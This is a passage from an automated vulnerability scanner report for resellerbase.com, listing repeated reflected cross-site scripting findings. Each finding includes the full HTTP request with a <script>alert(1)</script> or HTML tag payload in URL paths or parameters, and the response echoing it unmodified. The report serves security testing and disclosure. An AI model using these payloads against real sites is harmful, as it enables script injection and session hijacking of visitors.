The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c4e7<script>alert(1)</script>0c05ab04bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/97c4e7<script>alert(1)</script>0c05ab04bb9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/97c4e7<script>alert(1)</script>0c05ab04bb9/ was not found on this server.</p>
...[SNIP]...

2.3731. http://www.resellerbase.com/detail/9/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2689<script>alert(1)</script>dddbb8b7002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/?b2689<script>alert(1)</script>dddbb8b7002=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/?b2689<script>alert(1)</script>dddbb8b7002=1 was not found on this server.</p>
...[SNIP]...

2.3732. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd2dd<script>alert(1)</script>ca324181367 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd2dd<script>alert(1)</script>ca324181367/9/netapplications-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd2dd<script>alert(1)</script>ca324181367/9/netapplications-com.html was not found on this server.</p>
...[SNIP]...

2.3733. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b45b<a>857e4aeead7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/91b45b<a>857e4aeead7/netapplications-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/91b45b<a>857e4aeead7/netapplications-com.html was not found on this server.</p>
...[SNIP]...

2.3734. http://www.resellerbase.com/detail/9/netapplications-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/netapplications-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b868f<script>alert(1)</script>299344ead43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/b868f<script>alert(1)</script>299344ead43 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/b868f<script>alert(1)</script>299344ead43 was not found on this server.</p>
...[SNIP]...

2.3735. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac0fe<script>alert(1)</script>a6ea3912451a56443 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailac0fe<script>alert(1)</script>a6ea3912451a56443/9/rating.php?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailac0fe<script>alert(1)</script>a6ea3912451a56443/9/rating.php?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3736. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1bc2<script>alert(1)</script>3634e727579 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf1bc2<script>alert(1)</script>3634e727579/9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf1bc2<script>alert(1)</script>3634e727579/9/rating.php was not found on this server.</p>
...[SNIP]...

2.3737. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ed370<script>alert(1)</script>82fc284e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9ed370<script>alert(1)</script>82fc284e36f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9ed370<script>alert(1)</script>82fc284e36f/rating.php was not found on this server.</p>
...[SNIP]...

2.3738. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8118<script>alert(1)</script>1dd3701b1ce742b2e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9a8118<script>alert(1)</script>1dd3701b1ce742b2e/rating.php?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9a8118<script>alert(1)</script>1dd3701b1ce742b2e/rating.php?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3739. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 381ab<script>alert(1)</script>a3bb958f6c060ce75 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9/rating.php381ab<script>alert(1)</script>a3bb958f6c060ce75?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php381ab<script>alert(1)</script>a3bb958f6c060ce75?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3740. http://www.resellerbase.com/detail/9/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81429<script>alert(1)</script>b8575554e52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/rating.php81429<script>alert(1)</script>b8575554e52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php81429<script>alert(1)</script>b8575554e52 was not found on this server.</p>
...[SNIP]...

2.3741. http://www.resellerbase.com/detail/9/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55ffd<script>alert(1)</script>88e80f7029fc4c6a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/9/rating.php/55ffd<script>alert(1)</script>88e80f7029fc4c6a9?id=9&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php/55ffd<script>alert(1)</script>88e80f7029fc4c6a9?id=9&rating=5 was not found on this server.</p>
...[SNIP]...

2.3742. http://www.resellerbase.com/detail/9/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e67a<script>alert(1)</script>9af46a21c68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/rating.php?6e67a<script>alert(1)</script>9af46a21c68=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/rating.php?6e67a<script>alert(1)</script>9af46a21c68=1 was not found on this server.</p>
...[SNIP]...

2.3743. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dde52<script>alert(1)</script>b87e5cf825a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildde52<script>alert(1)</script>b87e5cf825a/9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildde52<script>alert(1)</script>b87e5cf825a/9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3744. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 861f6<script>alert(1)</script>e16ff7ecdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9861f6<script>alert(1)</script>e16ff7ecdbc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9861f6<script>alert(1)</script>e16ff7ecdbc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3745. http://www.resellerbase.com/detail/9/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2d744<script>alert(1)</script>4f5204db142 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/search.php2d744<script>alert(1)</script>4f5204db142?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php2d744<script>alert(1)</script>4f5204db142?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3746. http://www.resellerbase.com/detail/9/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 4764c<a>d26447fc576 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search4764c<a>d26447fc576&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search4764c<a>d26447fc576&opt=2 was not found on this server.</p>
...[SNIP]...

2.3747. http://www.resellerbase.com/detail/9/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eb80c<a>8b599f24116 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/search.php?keyword=search...eb80c<a>8b599f24116&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...eb80c<a>8b599f24116&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3748. http://www.resellerbase.com/detail/9/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af1af<script>alert(1)</script>c7732166311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=2&af1af<script>alert(1)</script>c7732166311=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/search.php?keyword=search...&Submit3=Search&opt=2&af1af<script>alert(1)</script>c7732166311=1 was not found on this server.</p>
...[SNIP]...

2.3749. http://www.resellerbase.com/detail/9/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
